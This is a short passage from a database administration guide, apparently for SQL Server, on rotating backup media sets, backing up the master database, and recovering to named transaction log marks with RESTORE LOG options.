    Best Practice For important databases, I recommend using four media sets. Use two sets for regular rotations. Use the third set for the first rotation cycle at the beginning of each month. Use the fourth set for the first rotation cycle of each quarter. This technique allows you to recover the database in a wide variety of situations.
    Using Backup Strategies
    The backup strategies are based on the type of database as well as the type of data. Two key things to keep in mind when planning a backup strategy are shown on the following page.
  • The master database stores important information about the structure of other databases, including the database size. Any time database information or structure changes, master can get updated without your knowing about it. For example, the size of most databases changes automatically, and when this happens master is updated. Because of this, often the best backup strategy for master is to schedule backups every other day and to rotate through several backup sets so that you can go back to several different versions of master if necessary.
  • You can use transaction logs to recover databases up to the point of failure and up to a point of work. To recover to a point of work you must insert named log marks into the transaction log using BEGIN TRANSACTION WITH MARK. You can then recover to a mark in the log using RESTORE LOG WITH STOPATMARK or RESTORE LOG WITH STOPBEFOREMARK.